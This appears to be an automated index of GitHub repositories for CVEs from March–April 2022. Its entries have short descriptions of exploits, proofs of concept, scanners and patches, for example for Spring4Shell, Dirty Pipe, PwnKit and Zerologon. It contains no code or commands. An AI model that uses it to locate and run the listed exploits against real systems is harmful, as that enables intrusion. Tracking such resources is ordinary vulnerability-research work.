**ShellShock interactive-shell exploit** : [akr3ch/CVE-2014-6271](https://github.com/akr3ch/CVE-2014-6271) create time: 2022-04-02T07:30:31Z

**XSS via Host Header injection and Steal Password Reset Token of another user** : [comrade99/CVE-2022-24181](https://github.com/comrade99/CVE-2022-24181) create time: 2022-03-22T08:06:53Z

**spring框架RCE漏洞 CVE-2022-22965** : [k3rwin/spring-core-rce](https://github.com/k3rwin/spring-core-rce) create time: 2022-03-31T12:41:29Z

**Local privilege escalation for OS X 10.10.5 via CVE-2016-1828.** : [SideGreenHand100/bazad5](https://github.com/SideGreenHand100/bazad5) create time: 2022-04-02T03:38:21Z

**no description** : [pqlx/CVE-2022-1015](https://github.com/pqlx/CVE-2022-1015) create time: 2022-04-02T03:27:11Z

**no description** : [Wrin9/CVE-2022-22965](https://github.com/Wrin9/CVE-2022-22965) create time: 2022-04-02T03:17:48Z

**Prova de conceito para a vulnerabilidade Polkit Pkexec: CVE-2021-4034(Pkexec Local Privilege Escalation)** : [Nosferatuvjr/PwnKit](https://github.com/Nosferatuvjr/PwnKit) create time: 2022-04-01T19:51:18Z

**no description** : [rwincey/spring4shell-CVE-2022-22965](https://github.com/rwincey/spring4shell-CVE-2022-22965) create time: 2022-03-31T18:09:58Z

**PoC for DoS vulnerability CVE-2021-37740 in firmware v3.0.3 of SCN-IP100.03 and SCN-IP000.03 by MDT. The bug has been fixed in firmware v3.0.4.** : [robertguetzkow/CVE-2021-37740](https://github.com/robertguetzkow/CVE-2021-37740) create time: 2022-04-01T18:07:42Z

**no description** : [ZephrFish/CVE-2022-28251-POC](https://github.com/ZephrFish/CVE-2022-28251-POC) create time: 2022-04-01T15:21:03Z

**no description** : [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325) create time: 2022-04-01T14:11:58Z

**CVE-2022-22965** : [wshon/spring-framework-rce](https://github.com/wshon/spring-framework-rce) create time: 2022-04-01T13:46:55Z

**Proof of Concept for CVE-2022-28251** : [mubix/CVE-2022-28251-POC](https://github.com/mubix/CVE-2022-28251-POC) create time: 2022-04-01T13:35:48Z

**Spring Cloud Function Vulnerable Application / CVE-2022-22963** : [me2nuk/CVE-2022-22963](https://github.com/me2nuk/CVE-2022-22963) create time: 2022-03-31T14:32:14Z

**CVE-2022-22965 Environment** : [Joe1sn/CVE-2022-22965](https://github.com/Joe1sn/CVE-2022-22965) create time: 2022-04-01T12:18:29Z

**no description** : [Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245](https://github.com/Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245) create time: 2022-04-01T11:04:45Z

**no description** : [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334) create time: 2022-04-01T11:10:57Z

**no description** : [nanopathi/linux-4.19.72_CVE-2021-32399](https://github.com/nanopathi/linux-4.19.72_CVE-2021-32399) create time: 2022-04-01T10:29:20Z

**no description** : [lcarea/CVE-2022-22965](https://github.com/lcarea/CVE-2022-22965) create time: 2022-04-01T10:51:05Z

**POC for CVE-2022-22963** : [AayushmanThapaMagar/CVE-2022-22963](https://github.com/AayushmanThapaMagar/CVE-2022-22963) create time: 2022-04-01T10:47:56Z

**no description** : [nanopathi/external_aac_AOSP10_r33_CVE-2020-0451](https://github.com/nanopathi/external_aac_AOSP10_r33_CVE-2020-0451) create time: 2022-04-01T09:20:38Z

**Spring-Cloud-Gateway-CVE-2022-22947** : [talentsec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/talentsec/Spring-Cloud-Gateway-CVE-2022-22947) create time: 2022-04-01T10:24:02Z

**no description** : [helsecert/CVE-2022-22965](https://github.com/helsecert/CVE-2022-22965) create time: 2022-04-01T10:16:24Z

**Proof-of-Concept for CVE-2022-22965 exploitation on a self-contained .JAR file built with Maven. Based off https://github.com/Kirill89/CVE-2022-22963-PoC and https://github.com/Pizz33/Spring-Cloud-Function-SpEL** : [JDierberger1/CVE-2022-22965-JAR-SCA-POC](https://github.com/JDierberger1/CVE-2022-22965-JAR-SCA-POC) create time: 2022-04-01T10:05:44Z

**no description** : [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392) create time: 2022-04-01T08:43:48Z

**CVE-2021-42287/CVE-2021-42278 exploits in powershell** : [XiaoliChan/Invoke-sAMSpoofing](https://github.com/XiaoliChan/Invoke-sAMSpoofing) create time: 2022-04-01T09:10:14Z

**CVE-2022-22965 spring-core批量检测脚本** : [chaosec2021/CVE-2022-22965-POC](https://github.com/chaosec2021/CVE-2022-22965-POC) create time: 2022-04-01T08:37:00Z

**批量无损检测** : [tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce](https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce) create time: 2022-04-01T07:55:26Z

**no description** : [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241) create time: 2022-04-01T06:45:15Z

**Spring-0day/CVE-2022-22965** : [nu0l/CVE-2022-22965](https://github.com/nu0l/CVE-2022-22965) create time: 2022-04-01T06:50:21Z

**no description** : [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652) create time: 2022-04-01T06:06:53Z

**Showcase of overridding the Spring Framework version in older Spring Boot versions** : [snicoll-scratches/spring-boot-cve-2022-22965](https://github.com/snicoll-scratches/spring-boot-cve-2022-22965) create time: 2022-04-01T06:16:20Z

**Presentation slides and supplementary material** : [stfnw/Debugging_Dirty_Pipe_CVE-2022-0847](https://github.com/stfnw/Debugging_Dirty_Pipe_CVE-2022-0847) create time: 2022-04-01T05:51:27Z

**SpringFramework 远程代码执行漏洞CVE-2022-22965** : [Axx8/SpringFramework_CVE-2022-22965_RCE](https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE) create time: 2022-04-01T04:51:44Z

**no description** : [Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397](https://github.com/Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397) create time: 2022-04-01T03:31:38Z

**SpringFramework 远程代码执行漏洞CVE-2022-22965** : [Axx8/SpringFramework_RCE_CVE-2022-22965](https://github.com/Axx8/SpringFramework_RCE_CVE-2022-22965) create time: 2022-04-01T04:15:25Z

**BIGIP F5** : [DDestinys/CVE-2021-22986](https://github.com/DDestinys/CVE-2021-22986) create time: 2022-04-01T02:02:33Z

**CSDFASDFAESFAEAEF** : [l4fu/CVE-2022-3000](https://github.com/l4fu/CVE-2022-3000) create time: 2022-04-01T02:59:03Z

**CVE-2022-22965 EXP** : [likewhite/CVE-2022-22965](https://github.com/likewhite/CVE-2022-22965) create time: 2022-04-01T02:25:46Z

**Created after the release of CVE-2022-22965 and CVE-2022-22963. Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used. Unpacks JARs and analyzes their Manifest files.** : [mebibite/springhound](https://github.com/mebibite/springhound) create time: 2022-04-01T00:34:29Z

**This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc/spring-webflux RCE termed "SpringShell".** : [kh4sh3i/Spring-CVE](https://github.com/kh4sh3i/Spring-CVE) create time: 2022-03-31T20:19:51Z

**Test for cve-2021-3864** : [walac/cve-2021-3864](https://github.com/walac/cve-2021-3864) create time: 2022-03-31T20:03:04Z

**CVE-2022-22965 poc including reverse-shell support** : [viniciuspereiras/CVE-2022-22965-poc](https://github.com/viniciuspereiras/CVE-2022-22965-poc) create time: 2022-03-31T19:19:52Z

**Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit** : [reznok/Spring4Shell-POC](https://github.com/reznok/Spring4Shell-POC) create time: 2022-03-31T00:24:28Z

**Spring4Shell Proof Of Concept/Information CVE-2022-22965** : [BobTheShoplifter/Spring4Shell-POC](https://github.com/BobTheShoplifter/Spring4Shell-POC) create time: 2022-03-30T07:54:45Z

**A Safer PoC for CVE-2022-22965 (Spring4Shell)** : [colincowie/Safer_PoC_CVE-2022-22965](https://github.com/colincowie/Safer_PoC_CVE-2022-22965) create time: 2022-03-31T16:58:56Z

**Vulnerabilidad RCE en Spring Framework via Data Binding on JDK 9+** : [GuayoyoCyber/CVE-2022-22965](https://github.com/GuayoyoCyber/CVE-2022-22965) create time: 2022-03-31T16:14:36Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0472](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0472) create time: 2022-03-31T15:28:01Z

**Spring Framework RCE (Quick pentest notes)** : [alt3kx/CVE-2022-22965_PoC](https://github.com/alt3kx/CVE-2022-22965_PoC) create time: 2022-03-31T15:43:06Z

**Threat Intelligence on Zero-Day for Spring4Shell (CVE-2010-1622)** : [strainerart/Spring4Shell](https://github.com/strainerart/Spring4Shell) create time: 2022-03-31T14:25:54Z

**A Proof-of-Concept (PoC) of the Spring Core RCE (Spring4Shell or CVE-2022-22963) in Bash (Linux).** : [exploitbin/CVE-2022-22963-Spring-Core-RCE](https://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCE) create time: 2022-03-31T14:29:24Z

**Spring Framework RCE (Quick pentest notes)** : [alt3kx/CVE-2022-22965_PoC](https://github.com/alt3kx/CVE-2022-22965_PoC) create time: 2022-03-31T02:50:46Z

**spring-core单个图形化利用工具,CVE-2022-22965及修复方案已出** : [light-Life/CVE-2022-22965-GUItools](https://github.com/light-Life/CVE-2022-22965-GUItools) create time: 2022-03-31T02:00:18Z

**CVE-2022-22965 : about spring core rce** : [Mr-xn/spring-core-rce](https://github.com/Mr-xn/spring-core-rce) create time: 2022-03-30T14:35:00Z

**no description** : [Kirill89/CVE-2022-22965-PoC](https://github.com/Kirill89/CVE-2022-22965-PoC) create time: 2022-03-31T13:21:49Z

**Exploit for Dirty-Pipe (CVE-2022-0847)** : [Nekoox/dirty-pipe](https://github.com/Nekoox/dirty-pipe) create time: 2022-03-31T11:47:31Z

**no description** : [puckiestyle/CVE-2022-22963](https://github.com/puckiestyle/CVE-2022-22963) create time: 2022-03-31T11:14:46Z

**no description** : [nanopathi/system_bt_AOSP10_r33_CVE-2020-0225](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0225) create time: 2022-03-31T10:23:25Z

**no description** : [Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330](https://github.com/Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330) create time: 2022-03-31T09:36:07Z

**no description** : [webraybtl/CVE-2022-24934](https://github.com/webraybtl/CVE-2022-24934) create time: 2022-03-31T09:59:01Z

**ColdFusion 8.0.1 - Arbitrary File Upload to RCE** : [persian64/CVE-2009-2265](https://github.com/persian64/CVE-2009-2265) create time: 2022-03-31T08:52:08Z

**CVE-2010-1622 redux** : [DDuarte/springshell-rce-poc](https://github.com/DDuarte/springshell-rce-poc) create time: 2022-03-31T08:06:46Z

**no description** : [nanopathi/system_core_AOSP10_r33_CVE-2020-0421](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0421) create time: 2022-03-31T07:42:58Z

**no description** : [nanopathi/system_bt_AOSP10_r33_CVE-2020-0463](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0463) create time: 2022-03-31T06:59:38Z

**no description** : [Trinadh465/frameworks_native_CVE-2020-0226](https://github.com/Trinadh465/frameworks_native_CVE-2020-0226) create time: 2022-03-31T06:43:19Z

**no description** : [Satheesh575555/System_bt_AOSP10-r33_CVE-2020-0449](https://github.com/Satheesh575555/System_bt_AOSP10-r33_CVE-2020-0449) create time: 2022-03-31T06:36:13Z

**no description** : [DoTuan1/Reserch-CVE-2021-41773](https://github.com/DoTuan1/Reserch-CVE-2021-41773) create time: 2022-03-31T01:48:33Z

**Spring Cloud Gateway RCE - CVE-2022-22947** : [sagaryadav8742/springcloudRCE](https://github.com/sagaryadav8742/springcloudRCE) create time: 2022-03-30T23:33:43Z

**try to determine if a host is vulnerable to SpringShell CVE‐2022‐22963** : [jschauma/check-springshell](https://github.com/jschauma/check-springshell) create time: 2022-03-30T21:30:09Z

**{ Spring Core 0day CVE-2022-22963 }** : [stevemats/Spring0DayCoreExploit](https://github.com/stevemats/Spring0DayCoreExploit) create time: 2022-03-30T19:07:35Z

**no description** : [Kirill89/CVE-2022-22963-PoC](https://github.com/Kirill89/CVE-2022-22963-PoC) create time: 2022-03-30T17:37:35Z

**Spring Core RCE CVE-2022-22963** : [TheGejr/SpringShell](https://github.com/TheGejr/SpringShell) create time: 2022-03-30T17:05:46Z

**no description** : [darryk10/CVE-2022-22963](https://github.com/darryk10/CVE-2022-22963) create time: 2022-03-30T15:49:32Z

**A TLS server using a vendored fork of the Go TLS stack that has renegotation indication extension forcibly disabled.** : [johnwchadwick/cve-2009-3555-test-server](https://github.com/johnwchadwick/cve-2009-3555-test-server) create time: 2022-03-30T15:02:48Z

**Python3 correction for SQLi code CMS Made Simple < 2.2.10 CVE: 2019-9053** : [Matthsh/SQLi-correction](https://github.com/Matthsh/SQLi-correction) create time: 2022-03-30T14:37:16Z

**no description** : [spiderz0ne/CVE-2021-41773](https://github.com/spiderz0ne/CVE-2021-41773) create time: 2022-03-30T15:04:27Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2020-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0391) create time: 2022-03-30T12:31:40Z

**no description** : [ShaikUsaf/linux-4.19.72_CVE-2020-10757](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-10757) create time: 2022-03-30T11:21:21Z

**CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_exploit** : [RanDengShiFu/CVE-2022-22963](https://github.com/RanDengShiFu/CVE-2022-22963) create time: 2022-03-30T11:36:42Z

**no description** : [Satheesh575555/linux-4.19.72_CVE-2020-8428](https://github.com/Satheesh575555/linux-4.19.72_CVE-2020-8428) create time: 2022-03-30T10:50:28Z

**no description** : [pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243) create time: 2022-03-30T09:35:35Z

**no description** : [nanopathi/linux-4.19.72_CVE-2020-25705](https://github.com/nanopathi/linux-4.19.72_CVE-2020-25705) create time: 2022-03-30T09:10:22Z

**no description** : [Satheesh575555/linux-4.19.72_CVE-2019-19252](https://github.com/Satheesh575555/linux-4.19.72_CVE-2019-19252) create time: 2022-03-30T07:51:50Z

**no description** : [Threonic/CVE-2021-28480](https://github.com/Threonic/CVE-2021-28480) create time: 2022-03-30T07:57:43Z

**no description** : [Satheesh575555/linux-4.19.72_CVE-2020-29368](https://github.com/Satheesh575555/linux-4.19.72_CVE-2020-29368) create time: 2022-03-29T12:40:37Z

**BatFlat CMS v1.3.6 - Improper Access Control** : [LeoBreaker1411/CVE-2021-41652](https://github.com/LeoBreaker1411/CVE-2021-41652) create time: 2022-03-30T06:29:02Z

**Details,PoC and patches for CVE-2022-23884** : [LuckyDogDog/CVE-2022-23884](https://github.com/LuckyDogDog/CVE-2022-23884) create time: 2022-03-30T04:26:31Z

**no description** : [nanopathi/KERNEL_CVE-2020-29370_FIX](https://github.com/nanopathi/KERNEL_CVE-2020-29370_FIX) create time: 2022-03-30T04:52:56Z

**CVE-2022-22963 PoC** : [dinosn/CVE-2022-22963](https://github.com/dinosn/CVE-2022-22963) create time: 2022-03-30T05:04:24Z

**no description** : [bigbigban1/CVE-2022-22947-exp](https://github.com/bigbigban1/CVE-2022-22947-exp) create time: 2022-03-30T03:10:23Z

**no description** : [metapox/CVE-2020-25613](https://github.com/metapox/CVE-2020-25613) create time: 2022-03-30T00:51:08Z

**golang implementation of CVE-2021-403** : [hAV9sad/CVE-2021-4034](https://github.com/hAV9sad/CVE-2021-4034) create time: 2022-03-30T01:20:02Z

**CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution** : [b4keSn4ke/CVE-2019-9193](https://github.com/b4keSn4ke/CVE-2019-9193) create time: 2022-03-29T21:02:02Z

**Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472).** : [Nekoox/zerologon](https://github.com/Nekoox/zerologon) create time: 2022-03-29T21:34:56Z

**no description** : [coco0x0a/CVE-2021-2109](https://github.com/coco0x0a/CVE-2021-2109) create time: 2022-03-29T19:29:29Z

**Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096** : [Maverick-cmd/Chrome-and-Edge-Version-Dumper](https://github.com/Maverick-cmd/Chrome-and-Edge-Version-Dumper) create time: 2022-03-29T20:06:33Z

**no description** : [horizon3ai/CVE-2021-44142](https://github.com/horizon3ai/CVE-2021-44142) create time: 2022-03-29T19:03:38Z

**no description** : [T4t4ru/CVE-2020-3187](https://github.com/T4t4ru/CVE-2020-3187) create time: 2022-03-29T18:06:29Z

**no description** : [hrsman/Samba-CVE-2021-44142](https://github.com/hrsman/Samba-CVE-2021-44142) create time: 2022-03-29T17:32:25Z

**no description** : [Vancomycin-g/CVE-2022-22947](https://github.com/Vancomycin-g/CVE-2022-22947) create time: 2022-03-29T17:17:34Z

**Scanner for CVE-2022-22948 an Information Disclosure in VMWare vCenter** : [PenteraIO/CVE-2022-22948](https://github.com/PenteraIO/CVE-2022-22948) create time: 2021-10-17T09:59:20Z

**no description** : [tzwlhack/CVE-2022-24934](https://github.com/tzwlhack/CVE-2022-24934) create time: 2022-03-29T15:51:29Z

**no description** : [tzwlhack/WPS-CVE-2022-24934](https://github.com/tzwlhack/WPS-CVE-2022-24934) create time: 2022-03-29T15:29:59Z

**no description** : [tzwlhack/CVE-2021-21017](https://github.com/tzwlhack/CVE-2021-21017) create time: 2022-03-29T14:45:16Z

**Veeam Unauth Remote Code Execution** : [sinsinology/CVE-2022-26500](https://github.com/sinsinology/CVE-2022-26500) create time: 2022-03-29T14:34:01Z

**CVE-2022-24934** : [nanaao/CVE-2022-24934](https://github.com/nanaao/CVE-2022-24934) create time: 2022-03-25T10:29:35Z

**no description** : [nanopathi/CVE-2020-29370_AFTERFIX](https://github.com/nanopathi/CVE-2020-29370_AFTERFIX) create time: 2022-03-29T14:17:51Z

**no description** : [nanopathi/CVE-2020-029370_AFTPATCH](https://github.com/nanopathi/CVE-2020-029370_AFTPATCH) create time: 2022-03-29T13:35:16Z

**no description** : [nanopathi/aft_KERNEL_KITTORVALDS_CVE2020-29370](https://github.com/nanopathi/aft_KERNEL_KITTORVALDS_CVE2020-29370) create time: 2022-03-29T11:55:26Z

**no description** : [nanopathi/kERNEL_GIT_TORVALDS_AFP_CVE-2020-29370](https://github.com/nanopathi/kERNEL_GIT_TORVALDS_AFP_CVE-2020-29370) create time: 2022-03-29T11:45:12Z

**no description** : [nanopathi/packages_apps_Nfc_cve-2020_02453](https://github.com/nanopathi/packages_apps_Nfc_cve-2020_02453) create time: 2022-03-29T09:29:01Z

**no description** : [Aevanathema/cve2018go](https://github.com/Aevanathema/cve2018go) create time: 2022-03-29T09:19:58Z

**no description** : [Trinadh465/Nfc-CVE-2020-0453](https://github.com/Trinadh465/Nfc-CVE-2020-0453) create time: 2022-03-29T09:03:39Z

**no description** : [nanopathi/Packages_apps_Nfc_CVE-2020-0453](https://github.com/nanopathi/Packages_apps_Nfc_CVE-2020-0453) create time: 2022-03-29T08:06:46Z

**no description** : [pazhanivel07/Nfc_CVE-2020-0453](https://github.com/pazhanivel07/Nfc_CVE-2020-0453) create time: 2022-03-29T06:17:38Z

**no description** : [koleksibot/CVE-2022](https://github.com/koleksibot/CVE-2022) create time: 2022-03-29T05:16:07Z

**Pasos a seguir para explotar la vulnerabilidad CVE-2021-27928** : [GatoGamer1155/CVE-2021-27928](https://github.com/GatoGamer1155/CVE-2021-27928) create time: 2022-03-29T02:54:37Z

**no description** : [jcatala/f_poc_cve-2021-4034](https://github.com/jcatala/f_poc_cve-2021-4034) create time: 2022-03-29T01:06:32Z

**no description** : [darkpills/CVE-2021-25094-tatsu-preauth-rce](https://github.com/darkpills/CVE-2021-25094-tatsu-preauth-rce) create time: 2022-01-03T21:19:42Z

**no description** : [0xNix/CVE-2021-4034](https://github.com/0xNix/CVE-2021-4034) create time: 2022-03-28T19:26:39Z

**Exploit for CVE-2022-27666** : [plummm/CVE-2022-27666](https://github.com/plummm/CVE-2022-27666) create time: 2022-03-23T22:54:28Z

**Suzuki connect app is used to get the car information like Fuel, Ignition status, Current location, Seat buckle status etc. In Ignis, Zeta variant car if the Fuel CAN messages and Seat buckle status is spoofed via OBD 2 port with the crafted value (e.g. zero percent fuel and Car seat is buckled ), then the same value is reflected on Suzuki connect app, which can mislead the user.** : [nsbogam/CVE-2022-26269](https://github.com/nsbogam/CVE-2022-26269) create time: 2022-03-28T17:10:24Z

**no description** : [puckiestyle/CVE-2021-41773](https://github.com/puckiestyle/CVE-2021-41773) create time: 2022-03-28T11:02:46Z

**no description** : [misterxid/watchguard_cve-2022-26318](https://github.com/misterxid/watchguard_cve-2022-26318) create time: 2022-03-28T10:53:38Z

**no description** : [Tankirat/CVE-2017-5638](https://github.com/Tankirat/CVE-2017-5638) create time: 2022-03-28T07:58:31Z

**Check and report for cve_2022_23307 (log4shell) on your system.** : [buluma/ansible-role-cve_2022-23307](https://github.com/buluma/ansible-role-cve_2022-23307) create time: 2022-03-28T08:20:31Z

**no description** : [Gaphuang/CVE-2022-10086-TEST-](https://github.com/Gaphuang/CVE-2022-10086-TEST-) create time: 2022-03-28T07:41:53Z

**CVE-2022-27927 Microfinance Management System V1.0 SQL Injection Vulnerability** : [erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated) create time: 2022-03-27T08:17:47Z

**Description of Exploit SMBGhost CVE-2020-0796** : [vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-](https://github.com/vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-) create time: 2022-03-28T04:58:17Z

**introduction to hacking second presentation** : [mehrzad1994/CVE-2021-21193](https://github.com/mehrzad1994/CVE-2021-21193) create time: 2022-03-28T03:51:58Z

**no description** : [chattopadhyaykittu/CVE-2017-0037](https://github.com/chattopadhyaykittu/CVE-2017-0037) create time: 2022-03-28T01:19:58Z

**CVE 2020-1034 exploit and presentation** : [GeorgyFirsov/CVE-2020-1034](https://github.com/GeorgyFirsov/CVE-2020-1034) create time: 2022-03-23T19:14:26Z

**Pasos a seguir para explotar la vulnerabilidad CVE-2021-27928** : [GatoGamer1155/CVE-2021-27928](https://github.com/GatoGamer1155/CVE-2021-27928) create time: 2022-03-27T23:46:36Z

**no description** : [N3w-elf/CVE-2021-41773-](https://github.com/N3w-elf/CVE-2021-41773-) create time: 2022-03-27T20:10:30Z

**Watchguard RCE POC CVE-2022-26318** : [Throns1956/watchguard_cve-2022-26318](https://github.com/Throns1956/watchguard_cve-2022-26318) create time: 2022-03-27T12:51:19Z

**CVE-2022-0995 exploit** : [Bonfee/CVE-2022-0995](https://github.com/Bonfee/CVE-2022-0995) create time: 2022-03-26T21:46:09Z

**Fake WPS Update Server PoC** : [MagicPiperSec/WPS-CVE-2022-24934](https://github.com/MagicPiperSec/WPS-CVE-2022-24934) create time: 2022-03-27T07:47:10Z

**no description** : [warmachine-57/CVE-2021-44117](https://github.com/warmachine-57/CVE-2021-44117) create time: 2022-03-27T05:50:34Z

**no description** : [sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability](https://github.com/sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability) create time: 2022-03-26T22:50:36Z

**no description** : [tzwlhack/CVE-2021-4034](https://github.com/tzwlhack/CVE-2021-4034) create time: 2022-03-26T14:30:11Z

**no description** : [sysenter-eip/CVE-2022-26629](https://github.com/sysenter-eip/CVE-2022-26629) create time: 2022-03-26T06:06:05Z

**no description** : [scopion/CVE-2022-26629](https://github.com/scopion/CVE-2022-26629) create time: 2022-03-25T06:16:09Z

**Poc** : [tmoneypenny/CVE-2022-0847](https://github.com/tmoneypenny/CVE-2022-0847) create time: 2022-03-22T03:17:51Z

**POC for CVE-2022-23648** : [raesene/CVE-2022-23648-POC](https://github.com/raesene/CVE-2022-23648-POC) create time: 2022-03-25T19:43:59Z

**CVE 2022-0847** : [Patocoh/Research-Dirty-Pipe](https://github.com/Patocoh/Research-Dirty-Pipe) create time: 2022-03-25T16:27:40Z

**Container Excape PoC for CVE-2022-0847 "DirtyPipe"** : [DataDog/dirtypipe-container-breakout-poc](https://github.com/DataDog/dirtypipe-container-breakout-poc) create time: 2022-03-09T19:38:44Z

**no description** : [tzwlhack/CVE-2018-20250](https://github.com/tzwlhack/CVE-2018-20250) create time: 2022-03-25T13:02:41Z

**poc for CVE-2022-22947** : [Nathaniel1025/CVE-2022-22947](https://github.com/Nathaniel1025/CVE-2022-22947) create time: 2022-03-25T12:43:53Z

**CVE-2019-0708 (BlueKeep) proof of concept allowing pre-auth RCE on Windows7** : [RICSecLab/CVE-2019-0708](https://github.com/RICSecLab/CVE-2019-0708) create time: 2020-03-15T19:33:53Z

**CVE-2022-24934** : [shakeman8/CVE-2022-24934](https://github.com/shakeman8/CVE-2022-24934) create time: 2022-03-25T07:13:17Z

**no description** : [sysenter-eip/CVE-2022-26629](https://github.com/sysenter-eip/CVE-2022-26629) create time: 2022-03-25T04:58:20Z

**no description** : [Jiang59991/cve-2021-21300-plus](https://github.com/Jiang59991/cve-2021-21300-plus) create time: 2022-03-25T02:59:41Z

**no description** : [spasm5/CVE-2018-12326](https://github.com/spasm5/CVE-2018-12326) create time: 2022-03-25T01:44:26Z

**A quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability. Only takes in host and port of web server as required arguments.** : [alexander-fernandes/CVE-2019-16278](https://github.com/alexander-fernandes/CVE-2019-16278) create time: 2022-03-24T12:06:55Z

**no description** : [nxtexploit/CVE-2020-3580](https://github.com/nxtexploit/CVE-2020-3580) create time: 2022-03-24T09:34:04Z

**CVE-2021-40373 - remote code execution** : [maikroservice/CVE-2021-40373](https://github.com/maikroservice/CVE-2021-40373) create time: 2021-08-31T13:03:10Z

**no description** : [the-valluvarsploit/CVE-2018-6574](https://github.com/the-valluvarsploit/CVE-2018-6574) create time: 2022-03-24T08:40:42Z

**This is a exploit code for CVE-202-8163** : [TKLinux966/CVE-2020-8163](https://github.com/TKLinux966/CVE-2020-8163) create time: 2022-03-24T06:43:39Z

**CVE-2022-0185 analysis write up** : [chenaotian/CVE-2022-25636](https://github.com/chenaotian/CVE-2022-25636) create time: 2022-03-24T07:04:55Z

**CVE-2021-44529 PoC** : [jkana/CVE-2021-44529](https://github.com/jkana/CVE-2021-44529) create time: 2022-03-24T03:58:16Z

**no description** : [buff07/CVE-2022-10249](https://github.com/buff07/CVE-2022-10249) create time: 2022-03-24T02:09:28Z

**PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254)** : [nonamecoder/CVE-2022-27254](https://github.com/nonamecoder/CVE-2022-27254) create time: 2022-03-23T15:03:09Z

**no description** : [mtthwstffrd/berdav-CVE-2021-4034](https://github.com/mtthwstffrd/berdav-CVE-2021-4034) create time: 2022-03-23T11:08:20Z

**Proof-of-concept exploit for CVE-2016-1827 on OS X Yosemite.** : [domain9065v/bazad3](https://github.com/domain9065v/bazad3) create time: 2022-03-23T06:02:52Z

**no description** : [buff07/CVE-2022-24294](https://github.com/buff07/CVE-2022-24294) create time: 2022-03-23T06:26:02Z

**no description** : [buff07/CVE-2022-24293](https://github.com/buff07/CVE-2022-24293) create time: 2022-03-23T06:25:56Z

**no description** : [buff07/CVE-2022-24292](https://github.com/buff07/CVE-2022-24292) create time: 2022-03-23T06:25:45Z

**Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability CVE-2021-41338 Security Vulnerability Released: Oct 12, 2021 Assigning CNA: Microsoft MITRE CVE-2021-41338 CVSS:3.1 5.5 / 5.0 Attack Vector Local Attack Complexity Low Privileges Required Low User Interaction None Scope Unchanged Confidentiality High Integrity None Availability None Exploit Code Maturity Proof-of-Concept Remediation Level Official Fix Report Confidence Confirmed Please see Common Vulnerability Scoring System for more information on the definition of these metrics. Exploitability The following table provides an exploitability assessment for this vulnerability at the time of original publication. Yes No Exploitation Less Likely** : [Mario-Kart-Felix/firewall-cve](https://github.com/Mario-Kart-Felix/firewall-cve) create time: 2022-03-22T22:53:32Z

**Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page.** : [febinrev/CVE-2021-46398_Chamilo-LMS-RCE](https://github.com/febinrev/CVE-2021-46398_Chamilo-LMS-RCE) create time: 2022-03-22T17:35:38Z

**CVE-2022-24990 TerraMaster TOS unauthenticated RCE via PHP Object Instantiation** : [0xf4n9x/CVE-2022-24990](https://github.com/0xf4n9x/CVE-2022-24990) create time: 2022-03-20T05:15:16Z

**CVE-2021-43530 A Universal XSS vulnerability was present in Firefox for Android resulting from improper sanitization when processing a URL scanned from a QR code. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 94.** : [hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-](https://github.com/hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-) create time: 2022-03-22T07:07:42Z

